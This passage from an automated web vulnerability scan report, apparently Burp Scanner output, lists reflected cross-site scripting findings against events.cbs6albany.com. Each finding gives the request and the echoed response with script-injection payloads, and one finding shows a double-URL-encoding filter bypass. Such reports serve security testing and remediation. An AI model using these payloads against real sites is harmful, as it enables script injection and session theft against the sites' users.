Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZGM5Y2EiPjxhPmI2MTRhNTg2YWRiIgpzdGF0ZSIHTlk%3D--96dd6b874ed050549e2427468a674e48c946bfc4; path=/; expires=Fri, 29-Apr-2011 05:51:59 GMT; HttpOnly
Content-Length: 24878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nydc9ca"><a>b614a586adb/events/visual+arts" />
...[SNIP]...

4.415. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 was submitted in the REST URL parameter 3. This input was echoed as 228be<script>alert(1)</script>32854513461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albany-ny/events/visual+arts228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:57:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 129
ETag: "6c9e3cdb7afefefa68721f753b9b688f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:57:18 GMT; HttpOnly
Content-Length: 15551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<h1 class="label">Albany Visual Arts228be<script>alert(1)</script>32854513461 Events</h1>
...[SNIP]...

4.416. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa was submitted in the REST URL parameter 3. This input was echoed as a5555"><script>alert(1)</script>30292223dfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albany-ny/events/visual+artsa5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:54:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 128
ETag: "aa4d5592b0cf53a77778faa741f6a45a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:54:54 GMT; HttpOnly
Content-Length: 15648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:title" content="Albany Visual Artsa5555"><script>alert(1)</script>30292223dfa Events" />
...[SNIP]...

4.417. http://events.cbs6albany.com/albany-ny/events/visual+arts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/visual+arts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a03"><script>alert(1)</script>ad406b8e27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 224
ETag: "6d9003a791c236cf186a6b1bfd7ed04c"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:33 GMT; HttpOnly
Content-Length: 24937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1" />
...[SNIP]...

4.418. http://events.cbs6albany.com/albany-ny/movies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437b9"><script>alert(1)</script>e4ff51d4685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/movies?437b9"><script>alert(1)</script>e4ff51d4685=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:41 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 24
ETag: "9605f66b6539c7659c7b10c4c5ae9144"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:41 GMT; HttpOnly
Content-Length: 32681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/movies?437b9"><script>alert(1)</script>e4ff51d4685=1" />
...[SNIP]...

4.419. http://events.cbs6albany.com/albany-ny/restaurants [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 670ce"><script>alert(1)</script>fe260681d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/restaurants?670ce"><script>alert(1)</script>fe260681d26=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 25
ETag: "2348403be917a7bde13b54cd5737fd69"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:47 GMT; HttpOnly
Content-Length: 42441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/restaurants?670ce"><script>alert(1)</script>fe260681d26=1" />
...[SNIP]...

4.420. http://events.cbs6albany.com/albany-ny/venues [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9fe"><a>3c7d630f61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyfd9fe"><a>3c7d630f61a/venues HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:38:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 271
ETag: "466afeacc611d787d02f6452edcf2726"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZmQ5ZmUiPjxhPjNjN2Q2MzBmNjFhIgpzdGF0ZSIHTlk%3D--155907a72ba339cb1ddf385bbd1bea0bc9449d87; path=/; expires=Fri, 29-Apr-2011 05:38:17 GMT; HttpOnly
Content-Length: 34291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyfd9fe"><a>3c7d630f61a/venues" />
...[SNIP]...

4.421. http://events.cbs6albany.com/albany-ny/venues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901f7"><script>alert(1)</script>71466104ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 30
ETag: "6797e052dbef6ab0e0d517cf81b533f9"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:34 GMT; HttpOnly
Content-Length: 34357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
